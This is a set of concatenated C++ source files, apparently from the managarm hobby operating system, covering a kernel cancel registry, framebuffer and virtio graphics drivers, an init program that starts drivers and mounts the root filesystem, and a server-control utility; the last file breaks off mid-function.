#endif // POSIX_SUBSYSTEM_DRVCORE_HPP
<file_sep>
#include "cancel.hpp"
#include "core.hpp"
namespace thor {
CancelNode::CancelNode()
: _registry{}, _asyncId{0}, _cancelCalled{false} { }
void CancelNode::finalizeCancel() {
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&_registry->_mutex);
_registry->_nodeMap.remove(_asyncId);
}
CancelRegistry::CancelRegistry()
: _nodeMap{frigg::DefaultHasher<uint64_t>{}, *kernelAlloc}, _nextAsyncId{1} { }
void CancelRegistry::issue(CancelNode *node) {
assert(!node->_registry && !node->_asyncId);
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&_mutex);
uint64_t id = _nextAsyncId++;
_nodeMap.insert(id, node);
node->_registry = _selfPtr.toShared();
node->_asyncId = id;
}
void CancelRegistry::cancel(uint64_t async_id) {
// TODO: We need QSGC here to prevent concurrent destruction of the node.
CancelNode *node;
{
auto irq_lock = frigg::guard(&irqMutex());
auto lock = frigg::guard(&_mutex);
// TODO: Return an error in this case.
assert(async_id && async_id < _nextAsyncId);
auto it = _nodeMap.get(async_id);
if(!it)
return;
node = *it;
}
assert(!node->_cancelCalled);
node->_cancelCalled = true;
node->handleCancel();
}
} // namespace thor
<file_sep>
#include <assert.h>
#include <stdio.h>
#include <deque>
#include <experimental/optional>
#include <functional>
#include <iostream>
#include <memory>
#include <numeric>
#include <arch/bits.hpp>
#include <arch/register.hpp>
#include <arch/io_space.hpp>
#include <async/result.hpp>
#include <boost/intrusive/list.hpp>
#include <cofiber.hpp>
#include <frigg/atomic.hpp>
#include <frigg/arch_x86/machine.hpp>
#include <frigg/memory.hpp>
#include <helix/ipc.hpp>
#include <helix/await.hpp>
#include <protocols/fs/server.hpp>
#include <protocols/hw/client.hpp>
#include <protocols/mbus/client.hpp>
#include <core/drm/core.hpp>
#include <libdrm/drm.h>
#include <libdrm/drm_mode.h>
#include "plainfb.hpp"
#include <fs.pb.h>
constexpr auto fileOperations = protocols::fs::FileOperations{}
.withRead(&drm_core::File::read)
.withAccessMemory(&drm_core::File::accessMemory)
.withIoctl(&drm_core::File::ioctl)
.withPoll(&drm_core::File::poll);
COFIBER_ROUTINE(cofiber::no_future, serveDevice(std::shared_ptr<drm_core::Device> device,
helix::UniqueLane p), ([device = std::move(device), lane = std::move(p)] {
std::cout << "gfx/plainfb: Connection" << std::endl;
while(true) {
helix::Accept accept;
helix::RecvInline recv_req;
auto &&header = helix::submitAsync(lane, helix::Dispatcher::global(),
helix::action(&accept, kHelItemAncillary),
helix::action(&recv_req));
COFIBER_AWAIT header.async_wait();
HEL_CHECK(accept.error());
HEL_CHECK(recv_req.error());
auto conversation = accept.descriptor();
managarm::fs::CntRequest req;
req.ParseFromArray(recv_req.data(), recv_req.length());
if(req.req_type() == managarm::fs::CntReqType::DEV_OPEN) {
assert(!req.flags());
helix::SendBuffer send_resp;
helix::PushDescriptor push_pt;
helix::PushDescriptor push_page;
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
auto file = smarter::make_shared<drm_core::File>(device);
async::detach(protocols::fs::servePassthrough(
std::move(local_lane), file, &fileOperations));
managarm::fs::SvrResponse resp;
resp.set_error(managarm::fs::Errors::SUCCESS);
resp.set_caps(managarm::fs::FC_STATUS_PAGE);
auto ser = resp.SerializeAsString();
auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
helix::action(&push_pt, remote_lane, kHelItemChain),
helix::action(&push_page, file->statusPageMemory()));
COFIBER_AWAIT transmit.async_wait();
HEL_CHECK(send_resp.error());
HEL_CHECK(push_pt.error());
HEL_CHECK(push_page.error());
}else{
throw std::runtime_error("Invalid request in serveDevice()");
}
}
}))
// ----------------------------------------------------------------
// GfxDevice.
// ----------------------------------------------------------------
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::initialize(), ([=] {
// Setup planes, encoders and CRTCs (i.e. the static entities).
auto plane = std::make_shared<Plane>(this);
_theCrtc = std::make_shared<Crtc>(this, plane);
_theEncoder = std::make_shared<Encoder>(this);
plane->setupWeakPtr(plane);
_theCrtc->setupWeakPtr(_theCrtc);
_theEncoder->setupWeakPtr(_theEncoder);
_theEncoder->setupPossibleCrtcs({_theCrtc.get()});
_theEncoder->setupPossibleClones({_theEncoder.get()});
_theEncoder->setCurrentCrtc(_theCrtc.get());
registerObject(plane.get());
registerObject(_theCrtc.get());
registerObject(_theEncoder.get());
setupCrtc(_theCrtc.get());
setupEncoder(_theEncoder.get());
// Setup the connector.
_theConnector = std::make_shared<Connector>(this);
_theConnector->setupWeakPtr(_theConnector);
_theConnector->setupPossibleEncoders({_theEncoder.get()});
_theConnector->setCurrentEncoder(_theEncoder.get());
_theConnector->setCurrentStatus(1);
registerObject(_theConnector.get());
attachConnector(_theConnector.get());
std::vector<drm_mode_modeinfo> supported_modes;
drm_core::addDmtModes(supported_modes, _screenWidth, _screenHeight);
std::sort(supported_modes.begin(), supported_modes.end(),
[] (const drm_mode_modeinfo &u, const drm_mode_modeinfo &v) {
return u.hdisplay * u.vdisplay > v.hdisplay * v.vdisplay;
});
_theConnector->setModeList(supported_modes);
}))
std::unique_ptr<drm_core::Configuration> GfxDevice::createConfiguration() {
return std::make_unique<Configuration>(this);
}
std::shared_ptr<drm_core::FrameBuffer> GfxDevice::createFrameBuffer(std::shared_ptr<drm_core::BufferObject> base_bo,
uint32_t width, uint32_t height, uint32_t format, uint32_t pitch) {
auto bo = std::static_pointer_cast<GfxDevice::BufferObject>(base_bo);
assert(pitch % 4 == 0);
assert(pitch / 4 >= width);
assert(bo->getSize() >= pitch * height);
auto fb = std::make_shared<FrameBuffer>(this, bo, pitch);
fb->setupWeakPtr(fb);
registerObject(fb.get());
return fb;
}
std::tuple<int, int, int> GfxDevice::driverVersion() {
return {0, 0, 1};
}
std::tuple<std::string, std::string, std::string> GfxDevice::driverInfo() {
return {"plainfb_gpu", "plainfb gpu", "0"};
}
std::pair<std::shared_ptr<drm_core::BufferObject>, uint32_t>
GfxDevice::createDumb(uint32_t width, uint32_t height, uint32_t bpp) {
HelHandle handle;
auto size = ((width * height * bpp / 8) + (4096 - 1)) & ~(4096 - 1);
HEL_CHECK(helAllocateMemory(size, 0, &handle));
auto bo = std::make_shared<BufferObject>(this, size,
helix::UniqueDescriptor(handle), width, height);
uint32_t pitch = width * bpp / 8;
auto mapping = installMapping(bo.get());
bo->setupMapping(mapping);
return std::make_pair(bo, pitch);
}
// ----------------------------------------------------------------
// GfxDevice::Configuration.
// ----------------------------------------------------------------
bool GfxDevice::Configuration::capture(std::vector<drm_core::Assignment> assignment) {
auto captureScanout = [&] () {
if(_state)
return;
_state.emplace();
// TODO: Capture FB, width and height.
_state->mode = _device->_theCrtc->currentMode();
};
for(auto &assign : assignment) {
if(assign.property == _device->srcWProperty()) {
//TODO: check this outside of capure
assert(assign.property->validate(assign));
captureScanout();
_state->width = assign.intValue;
}else if(assign.property == _device->srcHProperty()) {
//TODO: check this outside of capure
assert(assign.property->validate(assign));
captureScanout();
_state->height = assign.intValue;
}else if(assign.property == _device->fbIdProperty()) {
//TODO: check this outside of capure
assert(assign.property->validate(assign));
auto fb = assign.objectValue->asFrameBuffer();
captureScanout();
_state->fb = static_cast<GfxDevice::FrameBuffer *>(fb);
}else if(assign.property == _device->modeIdProperty()) {
//TODO: check this outside of capture.
assert(assign.property->validate(assign));
captureScanout();
_state->mode = assign.blobValue;
}else{
return false;
}
}
if(_state && _state->mode) {
// TODO: Consider current width/height if FB did not change.
drm_mode_modeinfo mode_info;
memcpy(&mode_info, _state->mode->data(), sizeof(drm_mode_modeinfo));
_state->height = mode_info.vdisplay;
_state->width = mode_info.hdisplay;
// TODO: Check max dimensions: _state->width > 1024 || _state->height > 768
if(_state->width <= 0 || _state->height <= 0)
return false;
if(!_state->fb)
return false;
}
return true;
}
void GfxDevice::Configuration::dispose() {
}
void GfxDevice::Configuration::commit() {
if(_state)
_device->_theCrtc->setCurrentMode(_state->mode);
_dispatch();
}
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::Configuration::_dispatch(), ([=] {
if(_state && _state->mode) {
// std::cout << "Swap to framebuffer " << _state[i]->fb->id()
// << " " << _state[i]->width << "x" << _state[i]->height << std::endl;
if(!_device->_claimedDevice) {
COFIBER_AWAIT _device->_hwDevice.claimDevice();
_device->_claimedDevice = true;
}
auto bo = _state->fb->getBufferObject();
assert(bo->getWidth() == _device->_screenWidth);
assert(bo->getHeight() == _device->_screenHeight);
auto dest = reinterpret_cast<char *>(_device->_fbMapping.get());
auto src = reinterpret_cast<char *>(bo->accessMapping());
for(unsigned int k = 0; k < bo->getHeight(); k++) {
memcpy(dest, src, bo->getWidth() * 4);
dest += _device->_screenPitch;
src += _state->fb->getPitch();
}
}else if(_state) {
assert(!_state->mode);
std::cout << "gfx/plainfb: Disable scanout" << std::endl;
}
complete();
}))
// ----------------------------------------------------------------
// GfxDevice::Connector.
// ----------------------------------------------------------------
GfxDevice::Connector::Connector(GfxDevice *device)
: drm_core::Connector { device->allocator.allocate() } {
// _encoders.push_back(device->_theEncoder.get());
}
// ----------------------------------------------------------------
// GfxDevice::Encoder.
// ----------------------------------------------------------------
GfxDevice::Encoder::Encoder(GfxDevice *device)
:drm_core::Encoder { device->allocator.allocate() } {
}
// ----------------------------------------------------------------
// GfxDevice::Crtc.
// ----------------------------------------------------------------
GfxDevice::Crtc::Crtc(GfxDevice *device, std::shared_ptr<Plane> plane)
: drm_core::Crtc{device->allocator.allocate()}, _device{device},
_primaryPlane{std::move(plane)} { }
drm_core::Plane *GfxDevice::Crtc::primaryPlane() {
return _primaryPlane.get();
}
// ----------------------------------------------------------------
// GfxDevice::FrameBuffer.
// ----------------------------------------------------------------
GfxDevice::FrameBuffer::FrameBuffer(GfxDevice *device,
std::shared_ptr<GfxDevice::BufferObject> bo, size_t pitch)
: drm_core::FrameBuffer{device->allocator.allocate()},
_device{device}, _bo{std::move(bo)}, _pitch{pitch} { }
size_t GfxDevice::FrameBuffer::getPitch() {
return _pitch;
}
GfxDevice::BufferObject *GfxDevice::FrameBuffer::getBufferObject() {
return _bo.get();
}
void GfxDevice::FrameBuffer::notifyDirty() {
// TODO: Re-blit the FrameBuffer if it is currently displayed.
std::cout << "gfx/plainfb: notifyDirty() is not implemented correctly" << std::endl;
}
// ----------------------------------------------------------------
// GfxDevice: Plane.
// ----------------------------------------------------------------
GfxDevice::Plane::Plane(GfxDevice *device)
: drm_core::Plane{device->allocator.allocate()} { }
// ----------------------------------------------------------------
// GfxDevice: BufferObject.
// ----------------------------------------------------------------
GfxDevice::BufferObject::BufferObject(GfxDevice *device,
size_t size, helix::UniqueDescriptor memory,
uint32_t width, uint32_t height)
: _device{device}, _size{size}, _memory{std::move(memory)},
_width{width}, _height{height} {
_bufferMapping = helix::Mapping{_memory, 0, getSize()};
}
std::shared_ptr<drm_core::BufferObject> GfxDevice::BufferObject::sharedBufferObject() {
return this->shared_from_this();
}
size_t GfxDevice::BufferObject::getSize() {
return _size;
}
uint32_t GfxDevice::BufferObject::getWidth() {
return _width;
}
uint32_t GfxDevice::BufferObject::getHeight() {
return _height;
}
void *GfxDevice::BufferObject::accessMapping() {
return _bufferMapping.get();
}
std::pair<helix::BorrowedDescriptor, uint64_t> GfxDevice::BufferObject::getMemory() {
return std::make_pair(helix::BorrowedDescriptor(_memory), 0);
}
// ----------------------------------------------------------------
//
// ----------------------------------------------------------------
COFIBER_ROUTINE(cofiber::no_future, bindController(mbus::Entity entity), ([=] {
protocols::hw::Device hw_device(COFIBER_AWAIT entity.bind());
auto info = COFIBER_AWAIT hw_device.getFbInfo();
auto fb_memory = COFIBER_AWAIT hw_device.accessFbMemory();
std::cout << "gfx/plainfb: Resolution " << info.width
<< "x" << info.height << " (" << info.bpp
<< " bpp, pitch: " << info.pitch << ")" << std::endl;
assert(info.bpp == 32);
auto gfx_device = std::make_shared<GfxDevice>(std::move(hw_device),
info.width, info.height, info.pitch,
helix::Mapping{fb_memory, 0, info.pitch * info.height});
gfx_device->initialize();
// Create an mbus object for the device.
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
mbus::Properties descriptor{
{"unix.subsystem", mbus::StringItem{"drm"}},
{"unix.devname", mbus::StringItem{"dri/card0"}}
};
auto handler = mbus::ObjectHandler{}
.withBind([=] () -> async::result<helix::UniqueDescriptor> {
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
serveDevice(gfx_device, std::move(local_lane));
async::promise<helix::UniqueDescriptor> promise;
promise.set_value(std::move(remote_lane));
return promise.async_get();
});
COFIBER_AWAIT root.createObject("gfx_plainfb", descriptor, std::move(handler));
}))
COFIBER_ROUTINE(cofiber::no_future, observeControllers(), ([] {
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
auto filter = mbus::Conjunction({
mbus::EqualsFilter("class", "framebuffer")
});
auto handler = mbus::ObserverHandler{}
.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
std::cout << "gfx/plainfb: Detected device" << std::endl;
bindController(std::move(entity));
});
COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
}))
int main() {
std::cout << "gfx/plainfb: Starting driver" << std::endl;
{
async::queue_scope scope{helix::globalQueue()};
observeControllers();
}
helix::globalQueue()->run();
return 0;
}
<file_sep>
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <iostream>
int main() {
int fd = open("/dev/helout", O_WRONLY);
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
printf("Starting posix-init\n");
// Start essential bus and storage drivers.
auto ehci = fork();
if(!ehci) {
execl("/bin/runsvr", "runsvr", "/sbin/ehci", nullptr);
}else assert(ehci != -1);
auto virtio = fork();
if(!virtio) {
execl("/bin/runsvr", "runsvr", "/sbin/virtio-block", nullptr);
}else assert(virtio != -1);
/*
auto block_ata = fork();
if(!block_ata) {
execl("/bin/runsvr", "runsvr", "/sbin/block-ata", nullptr);
}else assert(block_ata != -1);
*/
auto block_usb = fork();
if(!block_usb) {
execl("/bin/runsvr", "runsvr", "/sbin/storage", nullptr);
}else assert(block_usb != -1);
// Spin until /dev/sda0 becomes available. Then mount the rootfs and prepare it.
while(access("/dev/sda0", F_OK)) {
assert(errno == ENOENT);
std::cout << "Waiting for /dev/sda0" << std::endl;
sleep(1);
}
// Hack: Start UHCI only after EHCI devices are ready.
auto uhci = fork();
if(!uhci) {
execl("/bin/runsvr", "runsvr", "/sbin/uhci", nullptr);
}else assert(uhci != -1);
printf("init: Mounting /dev/sda0\n");
if(mount("/dev/sda0", "/realfs", "ext2", 0, ""))
throw std::runtime_error("mount() failed");
if(mount("", "/realfs/sys", "sysfs", 0, ""))
throw std::runtime_error("mount() failed");
if(mount("", "/realfs/dev", "devtmpfs", 0, ""))
throw std::runtime_error("mount() failed");
if(mount("", "/realfs/run", "tmpfs", 0, ""))
throw std::runtime_error("mount() failed");
if(mkdir("/dev/pts", 0620))
throw std::runtime_error("mkdir() failed");
if(mount("", "/realfs/dev/pts", "devpts", 0, ""))
throw std::runtime_error("mount() failed");
if(chroot("/realfs"))
throw std::runtime_error("chroot() failed");
// Some programs, e.g. bash with its builtin getcwd() cannot deal with CWD outside of /.
if(chdir("/"))
throw std::runtime_error("chdir() failed");
std::cout << "init: On /realfs" << std::endl;
auto upload = [] (const char *name) {
auto svrctl = fork();
if(!svrctl) {
execl("/usr/bin/runsvr", "upload", name, nullptr);
}else assert(svrctl != -1);
// TODO: Ensure the status is termination.
waitpid(svrctl, nullptr, 0);
};
upload("/usr/bin/gfx_bochs");
upload("/usr/bin/gfx_plainfb");
upload("/usr/bin/gfx_virtio");
upload("/usr/bin/ps2-hid");
upload("/usr/bin/hid");
upload("/usr/lib/libevbackend.so");
upload("/usr/lib/libdrm_core.so");
/*
auto gfx_virtio = fork();
if(!gfx_virtio) {
execl("/usr/bin/runsvr", "runsvr", "/usr/bin/gfx_virtio", nullptr);
}else assert(gfx_virtio != -1);
*/
/*
auto gfx_bochs = fork();
if(!gfx_bochs) {
execl("/usr/bin/runsvr", "runsvr", "/usr/bin/gfx_bochs", nullptr);
}else assert(gfx_bochs != -1);
*/
auto gfx_plainfb = fork();
if(!gfx_plainfb) {
execl("/usr/bin/runsvr", "runsvr", "/usr/bin/gfx_plainfb", nullptr);
}else assert(gfx_plainfb != -1);
while(access("/dev/dri/card0", F_OK)) {
assert(errno == ENOENT);
sleep(1);
}
/*
while(access("/dev/input/event0", F_OK)) {
assert(errno == ENOENT);
sleep(1);
}
*/
auto udev = fork();
if(!udev) {
execl("/usr/sbin/udevd", "udevd", nullptr);
//execl("/usr/sbin/udevd", "udevd", "--debug", nullptr);
}else assert(udev != -1);
while(access("/run/udev/rules.d", F_OK)) { // TODO: Use some other file to wait on?
assert(errno == ENOENT);
sleep(1);
}
auto input_ps2 = fork();
if(!input_ps2) {
execl("/usr/bin/runsvr", "runsvr", "/usr/bin/ps2-hid", nullptr);
}else assert(input_ps2 != -1);
auto input_hid = fork();
if(!input_hid) {
execl("/usr/bin/runsvr", "runsvr", "/usr/bin/hid", nullptr);
}else assert(input_hid != -1);
sleep(3);
/*
auto udev_trigger_devs = fork();
if(!udev_trigger_devs) {
execl("/usr/bin/udevadm", "udevadm", "trigger", "--action=add", nullptr);
}else assert(udev_trigger_devs != -1);
*/
auto modeset = fork();
if(!modeset) {
// putenv("MLIBC_DEBUG_MALLOC=1");
putenv("PATH=/usr/local/bin:/usr/bin:/bin");
putenv("XDG_RUNTIME_DIR=/run");
putenv("MESA_GLSL_CACHE_DISABLE=1");
// putenv("MESA_DEBUG=1");
// putenv("TGSI_PRINT_SANITY=1");
// putenv("SOFTPIPE_NO_RAST=1");
// putenv("SOFTPIPE_DUMP_FS=1");
//execve("/root/unixsock", args.data(), env.data());
//execve("/root/test-libudev", args.data(), env.data());
// execl("/usr/bin/kmscube", "kmscube", nullptr);
//execve("/root/modeset-render", args.data(), env.data());
//execve("/root/modeset-double-buffered", args.data(), env.data());
//execl("/usr/bin/weston", "weston", "--use-pixman", nullptr);
execl("/usr/bin/weston", "weston", nullptr);
}else assert(modeset != -1);
while(true)
sleep(60);
}
<file_sep>
#include <string.h>
#include <future>
#include <cofiber.hpp>
#include <cofiber/future.hpp>
#include "common.hpp"
#include "fs.hpp"
// --------------------------------------------------------
// FsNode implementation.
// --------------------------------------------------------
VfsType FsNode::getType() {
throw std::runtime_error("getType() is not implemented for this FsNode");
}
FutureMaybe<FileStats> FsNode::getStats() {
throw std::runtime_error("getStats() is not implemented for this FsNode");
}
std::shared_ptr<FsLink> FsNode::treeLink() {
throw std::runtime_error("treeLink() is not implemented for this FsNode");
}
FutureMaybe<std::shared_ptr<FsLink>> FsNode::getLink(std::string) {
throw std::runtime_error("getLink() is not implemented for this FsNode");
}
FutureMaybe<std::shared_ptr<FsLink>> FsNode::link(std::string, std::shared_ptr<FsNode>) {
throw std::runtime_error("link() is not implemented for this FsNode");
}
FutureMaybe<std::shared_ptr<FsLink>> FsNode::mkdir(std::string) {
throw std::runtime_error("mkdir() is not implemented for this FsNode");
}
FutureMaybe<std::shared_ptr<FsLink>> FsNode::symlink(std::string, std::string) {
throw std::runtime_error("symlink() is not implemented for this FsNode");
}
FutureMaybe<std::shared_ptr<FsLink>> FsNode::mkdev(std::string, VfsType, DeviceId) {
throw std::runtime_error("mkdev() is not implemented for this FsNode");
}
FutureMaybe<void> FsNode::unlink(std::string) {
throw std::runtime_error("unlink() is not implemented for this FsNode");
}
FutureMaybe<smarter::shared_ptr<File, FileHandle>>
FsNode::open(std::shared_ptr<FsLink>, SemanticFlags) {
throw std::runtime_error("open() is not implemented for this FsNode");
}
expected<std::string> FsNode::readSymlink(FsLink *link) {
async::promise<std::variant<Error, std::string>> p;
p.set_value(Error::illegalOperationTarget);
return p.async_get();
}
DeviceId FsNode::readDevice() {
throw std::runtime_error("readDevice() is not implemented for this FsNode");
}
<file_sep>
#include <fcntl.h>
#include <sys/stat.h>
#include <iostream>
#include <async/jump.hpp>
#include <helix/memory.hpp>
#include <protocols/mbus/client.hpp>
#include <svrctl.pb.h>
// ----------------------------------------------------------------------------
// svrctl handling.
// ----------------------------------------------------------------------------
helix::UniqueLane svrctlLane;
async::jump foundSvrctl;
COFIBER_ROUTINE(async::result<void>, enumerateSvrctl(), ([] {
auto root = COFIBER_AWAIT mbus::Instance::global().getRoot();
auto filter = mbus::Conjunction({
mbus::EqualsFilter("class", "svrctl")
});
auto handler = mbus::ObserverHandler{}
.withAttach([] (mbus::Entity entity, mbus::Properties properties) {
// std::cout << "runsvr: Found svrctl" << std::endl;
svrctlLane = helix::UniqueLane(COFIBER_AWAIT entity.bind());
foundSvrctl.trigger();
});
COFIBER_AWAIT root.linkObserver(std::move(filter), std::move(handler));
COFIBER_AWAIT foundSvrctl.async_wait();
COFIBER_RETURN();
}))
COFIBER_ROUTINE(async::result<void>, runServer(const char *name), ([=] {
helix::Offer offer;
helix::SendBuffer send_req;
helix::RecvInline recv_resp;
managarm::svrctl::CntRequest req;
req.set_req_type(managarm::svrctl::CntReqType::SVR_RUN);
req.set_name(name);
auto ser = req.SerializeAsString();
auto &&transmit = helix::submitAsync(svrctlLane, helix::Dispatcher::global(),
helix::action(&offer, kHelItemAncillary),
helix::action(&send_req, ser.data(), ser.size(), kHelItemChain),
helix::action(&recv_resp));
COFIBER_AWAIT transmit.async_wait();
HEL_CHECK(offer.error());
HEL_CHECK(send_req.error());
HEL_CHECK(recv_resp.error());
managarm::svrctl::SvrResponse resp;
resp.ParseFromArray(recv_resp.data(), recv_resp.length());
assert(resp.error() == managarm::svrctl::Error::SUCCESS);
COFIBER_RETURN();
}))
COFIBER_ROUTINE(async::result<void>, uploadFile(const char *name), ([=] {
// First, load the whole file into a buffer.
// TODO: stat() + read() introduces a TOCTTOU race.
struct stat st;
if(stat(name, &st))
throw std::runtime_error("Could not stat file");
auto fd = open(name, O_RDONLY);
auto buffer = malloc(st.st_size);
if(!buffer)
throw std::runtime_error("Could not allocate buffer for file");
off_t progress = 0;
while(progress < st.st_size) {
auto chunk = read(fd, buffer, st.st_size - progress);
if(chunk <= 0)
throw std::runtime_error("Error while reading file");
progress += chunk;
}
close(fd);
// Now, send the file to the kernel.
helix::Offer offer;
helix::SendBuffer send_req;
helix::SendBuffer send_data;
helix::RecvInline recv_resp;
managarm::svrctl::CntRequest req;
req.set_req_type(managarm::svrctl::CntReqType::FILE_UPLOAD);
req.set_name(name);
auto ser = req.SerializeAsString();
auto &&transmit = helix::submitAsync(svrctlLane, helix::Dispatcher::global(),
helix::action(&offer, kHelItemAncillary),
helix::action(&send_req, ser.data(), ser.size(), kHelItemChain),
helix::action(&send_data, buffer, progress, kHelItemChain),
helix::action(&recv_resp));
COFIBER_AWAIT transmit.async_wait();
HEL_CHECK(offer.error());
HEL_CHECK(send_req.error());
HEL_CHECK(recv_resp.error());
free(buffer);
managarm::svrctl::SvrResponse resp;
resp.ParseFromArray(recv_resp.data(), recv_resp.length());
assert(resp.error() == managarm::svrctl::Error::SUCCESS);
COFIBER_RETURN();
}))
// ----------------------------------------------------------------
// Freestanding mbus functions.
// ----------------------------------------------------------------
COFIBER_ROUTINE(cofiber::no_future, asyncMain(const char **args), ([=] {
COFIBER_AWAIT enumerateSvrctl();
if(!strcmp(args[0], "runsvr")) {
if(!args[1])
throw std::runtime_error("Expected at least one argument");
std::cout << "svrctl: Running " << args[1] << std::endl;
COFIBER_AWAIT runServer(args[1]);
exit(0);
}else if(!strcmp(args[0], "upload")) {
if(!args[1])
throw std::runtime_error("Expected at least one argument");
std::cout << "svrctl: Uploading " << args[1] << std::endl;
COFIBER_AWAIT uploadFile(args[1]);
exit(0);
}else{
throw std::runtime_error("Unexpected command for svrctl utility");
}
}))
int main(int argc, const char **argv) {
{
async::queue_scope scope{helix::globalQueue()};
asyncMain(argv);
}
helix::globalQueue()->run();
return 0;
}
<file_sep>
#include <assert.h>
#include <stdio.h>
#include <deque>
#include <experimental/optional>
#include <functional>
#include <iostream>
#include <memory>
#include <numeric>
#include <arch/bits.hpp>
#include <arch/register.hpp>
#include <arch/io_space.hpp>
#include <async/result.hpp>
#include <boost/intrusive/list.hpp>
#include <cofiber.hpp>
#include <frigg/atomic.hpp>
#include <frigg/arch_x86/machine.hpp>
#include <frigg/memory.hpp>
#include <helix/ipc.hpp>
#include <helix/await.hpp>
#include <protocols/fs/server.hpp>
#include <protocols/hw/client.hpp>
#include <protocols/mbus/client.hpp>
#include <core/drm/core.hpp>
#include <libdrm/drm.h>
#include <libdrm/drm_mode.h>
#include "virtio.hpp"
#include <fs.pb.h>
constexpr auto fileOperations = protocols::fs::FileOperations{}
.withRead(&drm_core::File::read)
.withAccessMemory(&drm_core::File::accessMemory)
.withIoctl(&drm_core::File::ioctl)
.withPoll(&drm_core::File::poll);
COFIBER_ROUTINE(cofiber::no_future, serveDevice(std::shared_ptr<drm_core::Device> device,
helix::UniqueLane p), ([device = std::move(device), lane = std::move(p)] {
std::cout << "unix device: Connection" << std::endl;
while(true) {
helix::Accept accept;
helix::RecvInline recv_req;
auto &&header = helix::submitAsync(lane, helix::Dispatcher::global(),
helix::action(&accept, kHelItemAncillary),
helix::action(&recv_req));
COFIBER_AWAIT header.async_wait();
HEL_CHECK(accept.error());
HEL_CHECK(recv_req.error());
auto conversation = accept.descriptor();
managarm::fs::CntRequest req;
req.ParseFromArray(recv_req.data(), recv_req.length());
if(req.req_type() == managarm::fs::CntReqType::DEV_OPEN) {
assert(!req.flags());
helix::SendBuffer send_resp;
helix::PushDescriptor push_pt;
helix::PushDescriptor push_page;
helix::UniqueLane local_lane, remote_lane;
std::tie(local_lane, remote_lane) = helix::createStream();
auto file = smarter::make_shared<drm_core::File>(device);
async::detach(protocols::fs::servePassthrough(
std::move(local_lane), file, &fileOperations));
managarm::fs::SvrResponse resp;
resp.set_error(managarm::fs::Errors::SUCCESS);
resp.set_caps(managarm::fs::FC_STATUS_PAGE);
auto ser = resp.SerializeAsString();
auto &&transmit = helix::submitAsync(conversation, helix::Dispatcher::global(),
helix::action(&send_resp, ser.data(), ser.size(), kHelItemChain),
helix::action(&push_pt, remote_lane, kHelItemChain),
helix::action(&push_page, file->statusPageMemory()));
COFIBER_AWAIT transmit.async_wait();
HEL_CHECK(send_resp.error());
HEL_CHECK(push_pt.error());
HEL_CHECK(push_page.error());
}else{
throw std::runtime_error("Invalid request in serveDevice()");
}
}
}))
// ----------------------------------------------------------------
// GfxDevice.
// ----------------------------------------------------------------
struct AwaitableRequest : virtio_core::Request {
static void complete(virtio_core::Request *base) {
auto self = static_cast<AwaitableRequest *>(base);
self->_handle.resume();
}
AwaitableRequest(virtio_core::Queue *queue, virtio_core::Handle descriptor)
: _queue{queue}, _descriptor{descriptor} { }
bool await_ready() {
return false;
}
void await_suspend(cofiber::coroutine_handle<> handle) {
_handle = handle;
_queue->postDescriptor(_descriptor, this, &AwaitableRequest::complete);
_queue->notify();
}
void await_resume() {
}
private:
virtio_core::Queue *_queue;
virtio_core::Handle _descriptor;
cofiber::coroutine_handle<> _handle;
};
GfxDevice::GfxDevice(std::unique_ptr<virtio_core::Transport> transport)
: _transport{std::move(transport)}, _claimedDevice{false} { }
COFIBER_ROUTINE(cofiber::no_future, GfxDevice::initialize(), ([=] {
_transport->finalizeFeatures();
_transport->claimQueues(2);
_controlQ = _transport->setupQueue(0);
_cursorQ = _transport->setupQueue(1);
_transport->runDevice();
auto num_scanouts = static_cast<uint32_t>(_transport->space().load(spec::cfg::numScanouts));
for(size_t i = 0; i < num_scanouts; i++) {
auto plane = std::make_shared<Plane>(this, i);
auto crtc = std::make_shared<Crtc>(this, i, plane);
auto encoder = std::make_shared<Encoder>(this);
plane->setupWeakPtr(plane);
crtc->setupWeakPtr(crtc);
encoder->setupWeakPtr(encoder);
encoder->setupPossibleCrtcs({crtc.get()});
encoder->setupPossibleClones({encoder.get()});
encoder->setCurrentCrtc(crtc.get());
registerObject(plane.get());
registerObject(crtc.get());
registerObject(encoder.get());
setupCrtc(crtc.get());
setupEncoder(encoder.get());
_theCrtcs[i] = crtc;
_theEncoders[i] = encoder;
}
spec::Header header;
header.type = spec::cmd::getDisplayInfo;
header.flags = 0;
header.fenceId = 0;
header.contextId = 0;
header.padding = 0;
spec::DisplayInfo info;
virtio_core::Request request;
virtio_core::Chain chain;
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::hostToDevice, chain, _controlQ,
arch::dma_buffer_view{nullptr, &header, sizeof(spec::Header)});
COFIBER_AWAIT virtio_core::scatterGather(virtio_core::deviceToHost, chain, _controlQ,
arch::dma_buffer_view{nullptr, &info, sizeof(spec::DisplayInfo)});
COFIBER_AWAIT AwaitableRequest{_controlQ, chain.front()};
for(size_t i = 0; i < 16; i++) {
if(info.modes[i].enabled) {
auto connector = std::make_shared<Connector>(this);
connector->setupWeakPtr(connector);
connector->setupPossibleEncoders({_theEncoders[i].get()});
connector->setCurrentEncoder(_theEncoders[i].get());
connector->setCurrentStatus(1);
registerObject(connector.get());
attachConnector(connector.get());
std::vector<drm_mode_modeinfo> supported_modes;
drm_core::addDmtModes(supported_modes, info.modes[i].rect.width,
info.modes[i].rect.height);
std::sort(supported_modes.begin(), supported_modes.end(),
[] (const drm_mode_modeinfo &u, const drm_mode_modeinfo &v) {
return u.hdisplay * u.vdisplay > v.hdisplay * v.vdisplay;
});
connector->setModeList(supported_modes);
_activeConnectors[i] = connector;
}
}
